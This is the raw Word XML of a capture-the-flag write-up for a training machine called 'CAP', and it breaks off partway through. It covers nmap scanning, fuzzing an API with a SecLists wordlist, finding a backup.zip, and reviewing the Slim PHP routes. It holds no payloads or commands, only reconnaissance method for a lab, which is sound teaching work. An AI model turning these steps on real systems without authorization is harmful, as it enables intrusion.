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pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.md5x29xlq8di" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.w1hcz8xjrvf5" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">About Hacking Club</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">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Hacking Club is a platform to learn cybersecurity, an incredible resource if you don’t know where to start. In addition to vulnerable machines, you have access to classes and challenges to practice your skills and access to an exclusive community to play and challenge yourself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6gjyyfwyiu02" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The best part about </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking Club</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is that it is very hands-on. If you are new to hacking, give it a try.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.le3alcaxdf4o" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This write-up refers to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CAP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine. If you require support, please open a ticket in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">support channel on the Discord server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.pzt0mbksr6ra" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Scan:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">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We need to know which services are running in the background and which ports are open. So, we will use a tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">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4800600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74" name="image29.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image29.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4800600"/>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pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.rhbkuprdai2h" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Site:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">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579800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="54807" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1579800"/>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Apparently we have an API that returns a JSON response stating that the route was not found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>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10">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.fxnmpvhe1cp" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FUZZ:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SecLists/quickhits.txt at master · danielmiessler/SecLists</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/quickhits.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">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3022600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65" name="image14.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="302260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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We found a file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backup.zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">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3822700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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5943600" cy="3822700"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we can see that the application is using a framework → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Slim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Slim </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a PHP micro-framework that helps you write simple yet powerful web APIs and applications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">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4813300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4813300"/>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We will perform a code review to understand how this application works.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We have a route </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/_ul/usuarios/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1562100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77" name="image26.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image26.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1562100"/>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:controller</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the name of the class that will be passed — we will use the class </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usuarios</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:parameter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is located will be the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
